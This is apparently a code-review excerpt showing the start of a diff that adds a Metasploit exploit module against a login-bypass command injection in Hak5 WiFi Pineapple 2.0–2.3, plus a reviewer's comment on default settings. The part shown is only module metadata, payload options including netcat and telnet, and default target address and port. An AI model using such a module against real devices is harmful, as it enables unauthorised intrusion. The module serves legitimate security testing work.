modules/exploits/linux/http/pineapple_bypass_cmdinject.rb

```diff
@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
+                      'Description'    => "
+                           This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
+                           These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
+                           Provided as part of the TospoVirus workshop at DEFCON23.",
+                      'Author'         => ['catatonicprime'],
+                      'License'        => MSF_LICENSE,
+                      'References'     => [ ],
+                      'Platform'       => ['unix'],
+                      'Arch'           => ARCH_CMD,
+                      'Privileged'     => false,
+                      'Payload'        => {
+                        'Space'       => 2048,
+                        'DisableNops' => true,
+                        'Compat'      =>
+                          {
+                            'PayloadType' => 'cmd',
+                            'RequiredCmd' => 'generic python netcat telnet'
+                          }
+                      },
+                      'Targets'        => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
+                      'DefaultOptions' => {
+                        'RHOST' => '172.16.42.1',
+                        'RPORT' => 1471
```

Comment:
Actually, let me say the "vast majority" of cases. There may be cases where a user might want to change this. I just can't imagine it from a practical standpoint per se.